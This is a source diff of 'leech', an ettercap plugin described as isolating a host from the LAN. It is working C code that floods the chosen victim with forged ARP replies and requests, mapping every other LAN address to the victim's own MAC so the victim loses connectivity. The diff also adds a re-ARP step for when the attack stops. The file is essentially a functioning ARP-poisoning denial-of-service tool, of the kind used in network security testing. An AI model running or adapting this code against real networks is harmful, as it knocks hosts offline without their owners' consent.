@@ -17,7 +17,7 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: leech.c,v 1.5 2002/02/10 10:07:01 alor Exp $
+    $Id: leech.c,v 1.8 2002/03/16 10:24:44 alor Exp $
 */
 
 #include <unistd.h>
@@ -36,10 +36,10 @@ int leech_function(void *dummy);
 
 // plugin operation
 
-struct plugin_ops ops = {
+struct plugin_ops leech_ops = {
    ettercap_version: VERSION,
    plug_info:        "Isolate a host from the LAN",
-   plug_version:     17,
+   plug_version:     22,
    plug_type:        PT_EXT,
    hook_point:       HOOK_NONE,
    hook_function:    &leech_function,
@@ -49,7 +49,7 @@ struct plugin_ops ops = {
 
 int Plugin_Init(void *params)
 {
-   return Plugin_Register(params, &ops);
+   return Plugin_Register(params, &leech_ops);
 }
 
 int Plugin_Fini(void *params)
@@ -61,66 +61,93 @@ int Plugin_Fini(void *params)
 
 int leech_function(void *dummy)
 {
-    int IPS, IPD, sock, i;
-    unsigned char MACS[6];
-    unsigned char MACD[6];
-    char *pck_to_send;
-    char cont[10];
+   int IPS, IPD, sock, i;
+   unsigned char MACS[6];
+   unsigned char MACD[6];
+   unsigned char MACA[6];
+   char *pck_to_send;
+   char cont[10];
 
-    if (!strcmp(Host_Dest.ip,""))
-    {
+   if (!strcmp(Host_Dest.ip,""))
+   {
       Plugin_Output("Please select a Dest...\n");
       return 0;
-    }
+   }
 
-    memset(cont, 0, 10);
+   memset(cont, 0, 10);
 
-    Plugin_Output("Are you sure you want to isolate %s ? (yes/no) ", Host_Dest.ip );
-    Plugin_Input(cont, 5, P_BLOCK);
-    if (strcmp(cont, "yes"))  // not sure... ;)
-    {
+   Plugin_Output("Are you sure you want to isolate %s ? (yes/no) ", Host_Dest.ip );
+   Plugin_Input(cont, 5, P_BLOCK);
+  
+   if (strncmp(cont, "yes", 3))  // not sure... ;)
+   {
       Plugin_Output("\nIt is safe!  for now...\n");
       return 0;
-    }
-    Plugin_Output("\nBuilding host list for netmask %s, please wait...\n", Inet_MySubnet());
-         number_of_hosts_in_lan = Inet_HostInLAN();
+   }
+   
+   if (number_of_hosts_in_lan <= 1) {
+     Plugin_Output("\nBuilding host list for netmask %s, please wait...\n", Inet_MySubnet());
+      number_of_hosts_in_lan = Inet_HostInLAN();
+   }
+   
+   for (i=0; i < number_of_hosts_in_lan; i++)
+     if (!strcmp(Host_Dest.ip, Host_In_LAN[i].ip))
+        Inet_GetMACfromString(Host_In_LAN[i].mac, MACD);
 
-    for (i=0; i<number_of_hosts_in_lan; i++)
-        if (!strcmp(Host_Dest.ip, Host_In_LAN[i].ip))
-       Inet_GetMACfromString(Host_In_LAN[i].mac, MACD);
+   IPD = inet_addr(Host_Dest.ip);
 
-    IPD = inet_addr(Host_Dest.ip);
+   sock = Inet_OpenRawSock(Options.netiface);
+   Inet_GetIfaceInfo(Options.netiface, 0, MACS, 0, 0);
 
-    sock = Inet_OpenRawSock(Options.netiface);
-    Inet_GetIfaceInfo(Options.netiface, 0, MACS, 0, 0);
+   pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
+   Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_ARP );
 
-    pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
-    Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_ARP );
+   Plugin_Output("\nIsolating host %s...",Host_Dest.ip);
+   Plugin_Output("Press return to stop");
 
-    Plugin_Output("\nIsolating host %s...",Host_Dest.ip);
-    Plugin_Output("Press return to stop");
-
-    loop
-    {
+   loop
+   {
       int j;
-
+      
+      i++;
+     
       for (j=0; j<number_of_hosts_in_lan; j++)
       {
-         IPS=inet_addr(Host_In_LAN[j].ip);
-         if (IPS!=IPD)
+         IPS = inet_addr(Host_In_LAN[j].ip);
+         if (IPS != IPD)
          {
-            Inet_Forge_arp( pck_to_send+ETH_HEADER, ARPOP_REPLY, MACD, IPS, MACD, IPD);
+            Inet_Forge_arp( pck_to_send+ETH_HEADER, (i%2) ? ARPOP_REQUEST : ARPOP_REPLY, MACD, IPS, MACD, IPD);
             Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + ARP_HEADER);
          }
       }
-      sleep(Options.delay);
+
+      sleep(2);
+
       if (Plugin_Input(cont, 1, P_NONBLOCK))
       {
+         Plugin_Output("\nReARPing the victim (%s)...\n\n", Host_Dest.ip);
+              
+         for (j=0; j<number_of_hosts_in_lan; j++)
+         {
+            IPS = inet_addr(Host_In_LAN[j].ip);
+            Inet_GetMACfromString(Host_In_LAN[j].mac, MACA);
+
+            Plugin_Output(" %s is at %s\n", Host_In_LAN[j].ip, Host_In_LAN[j].mac);
+            
+            if (IPS != IPD)
+            {
+               Inet_Forge_arp( pck_to_send+ETH_HEADER, ARPOP_REPLY, MACA, IPS, MACD, IPD);
+               Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + ARP_HEADER);
+            }
+         }
+         
          Inet_Forge_packet_destroy( pck_to_send );
          Inet_CloseRawSock(sock);
          return 0;
       }
-    }
+   }
 }
 
 /* EOF */
+
+// vim:ts=3:expandtab
